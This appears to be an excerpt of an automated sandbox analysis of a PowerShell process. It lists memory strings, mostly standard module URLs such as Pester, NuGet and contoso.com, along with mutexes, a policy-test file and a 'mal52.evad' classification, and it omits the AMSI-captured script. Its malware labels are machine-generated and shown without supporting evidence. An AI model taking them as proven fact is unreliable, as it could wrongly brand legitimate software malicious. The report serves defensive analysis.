Source: http://pesterbdd.com/images/Pester.png | URL Reputation: Label: malware |
Source: | Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.1647288886.00000206D6704000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: mscorlib.pdbdbID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000000.00000002.1646864953.00000206D4940000.00000004.00000020.00020000.00000000.sdmp |
Source: powershell.exe, 00000000.00000002.1647459334.00000206DB8E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1647459334.00000206DCBA3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000000.00000002.1647459334.00000206DCB1D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000000.00000002.1647459334.00000206D6801000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000000.00000002.1647459334.00000206DB1F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1647459334.00000206DC63D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0 |
Source: powershell.exe, 00000000.00000002.1647459334.00000206DCB1D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000000.00000002.1647459334.00000206D6801000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000000.00000002.1647459334.00000206DCBA3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000000.00000002.1647459334.00000206DCBA3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000000.00000002.1647459334.00000206DCBA3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000000.00000002.1647459334.00000206DCB1D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000000.00000002.1647459334.00000206D972B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000000.00000002.1647459334.00000206DB8E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1647459334.00000206DCBA3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000000.00000002.1647459334.00000206DB1F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1647459334.00000206DC63D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.org |
Source: powershell.exe, 00000000.00000002.1647459334.00000206DB1F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1647459334.00000206DC63D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.orgX |
Source: classification engine | Classification label: mal52.evad.winPS1@2/5@0/0 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7544:120:WilError_03 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qmvq5uzg.d44.ps1 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: (obfuscated PowerShell script buffer captured by AMSI; content omitted) |